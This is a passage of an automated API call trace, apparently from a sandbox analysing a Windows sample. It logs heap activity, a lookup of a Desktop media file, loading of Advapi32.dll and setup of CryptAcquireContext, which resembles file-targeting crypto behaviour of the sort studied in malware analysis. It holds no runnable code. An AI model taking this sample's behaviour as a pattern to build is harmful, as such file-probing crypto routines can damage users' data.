dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0127.806] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WrCkWcj.m4a", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48ff38d0, ftCreationTime.dwHighDateTime=0x1d5e475, ftLastAccessTime.dwLowDateTime=0x4b71c330, ftLastAccessTime.dwHighDateTime=0x1d5f11d, ftLastWriteTime.dwLowDateTime=0x4b71c330, ftLastWriteTime.dwHighDateTime=0x1d5f11d, nFileSizeHigh=0x0, nFileSizeLow=0x7ee3, dwReserved0=0x0, dwReserved1=0x8, cFileName="WrCkWcj.m4a", cAlternateFileName="")) returned 0x41ac640 [0127.806] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0127.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0127.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0127.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0127.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0127.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0127.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0127.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0127.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0127.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0127.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0127.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0127.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0127.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0127.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.807] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0127.807] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0127.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0127.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0127.807] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0127.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0127.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0127.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392148 | out: hHeap=0x1780000) returned 1 [0127.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0127.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0127.808] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0127.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0127.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0127.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0127.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0127.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0127.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0127.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0127.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0127.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0127.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0127.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0127.810] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0127.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0127.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0127.810] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0127.810] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0127.810] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0127.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0127.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0127.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0127.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0127.811] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0127.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0127.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0127.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0127.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0127.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0127.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0127.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0127.811] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0127.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0127.811] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0127.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0127.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0127.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0127.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0127.812] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0127.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0127.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0127.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.812] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0127.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0127.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0127.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0127.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0127.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0127.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0127.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0127.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0127.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0127.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0127.813] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0127.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0127.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0127.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0127.813] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0127.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0127.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0127.814] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0127.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0127.814] PeekMessageW (in: lpMsg=0x144ea34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea34) returned 0 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0127.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0127.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0127.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0127.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0127.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0127.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0127.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0127.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0127.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0127.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0127.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0127.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0127.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0127.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0127.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0127.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0127.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0127.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0127.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0127.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0127.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0127.816] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0127.817] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0127.818] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0127.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0127.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", 